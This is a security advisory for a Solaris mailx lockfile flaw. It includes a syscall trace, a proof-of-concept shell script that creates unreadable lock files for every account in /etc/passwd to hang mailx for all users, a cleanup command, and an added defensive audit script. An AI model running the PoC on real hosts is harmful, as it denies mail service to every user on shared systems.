Vulnerability

    mailx

Affected

    Solaris

Description

    'optyx' found the following. When mailx is run, it creates a lockfile
    in /var/mail and links it to /var/mail/username.lock:

        open("/var/mail/rootSxa4Mv", O_RDWR|O_CREAT|O_EXCL, 0600) = 4
        link("/var/mail/rootSxa4Mv", "/var/mail/root.lock") = 0

    If the file /var/mail/username.lock exists and mailx can delete it,
    mailx will hang for a while and then exit, deleting the
    /var/mail/username.lock file. If the file /var/mail/username.lock
    exists and cannot be deleted, mailx will hang and not exit. The user
    can control-C out of mailx. An example shell script follows.

        #!/bin/sh
        # Solaris mailx(1) username.lock proof of theory
        # makes mailx not work for all users except
        # those that can erase the lockfile
        # even so mailx will hang for a long time
        # Tested on Solaris 2.6, 7, 8
        # by Optyx <optyx@uberhax0r.net>
        # http://www.uberhax0r.net

        echo "mailx-lock by optyx. http://www.uberhax0r.net"
        for x in `cat /etc/passwd | cut -d':' -f1`;do
        touch /var/mail/$x.lock
        chmod 0 /var/mail/$x.lock
        done

Solution

    To fix this, remove the lock files:

        rm /var/mail/*.lock
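
    An added example, not part of the original advisory or of optyx's
    script: a shell check that lists lock files in the spool whose mode is
    not the 0600 seen in the traced open() call, which is what the script
    above leaves behind. The function name audit_mail_locks is hypothetical,
    and treating every other mode as suspect is an assumption.

```shell
#!/bin/sh
# Added example: audit a mail spool for lock files that mailx did not create.
# Assumption: a genuine lock carries mode 0600, as in the open() call traced
# in the advisory; the proof-of-concept script leaves mode 0 files instead.

# Print one line per suspect lock: "<mode> <owner> <path>".
audit_mail_locks() {
    spool=${1:-/var/mail}
    # "-perm 0600" is an exact match, so "! -perm 0600" selects every
    # lock file with any other permission bits.
    find "$spool" -type f -name '*.lock' ! -perm 0600 -print |
    while IFS= read -r lock; do
        # ls -ld columns: 1 = mode string, 3 = owner (useful for triage).
        meta=$(ls -ld "$lock" | awk '{print $1, $3}')
        printf '%s %s\n' "$meta" "$lock"
    done
}

# Run against the directory given on the command line, if any.
if [ "$#" -gt 0 ]; then
    audit_mail_locks "$1"
fi
```

    Review the reported owner before removing a lock; a file owned by an
    account other than the mailbox user was not created on that user's
    behalf.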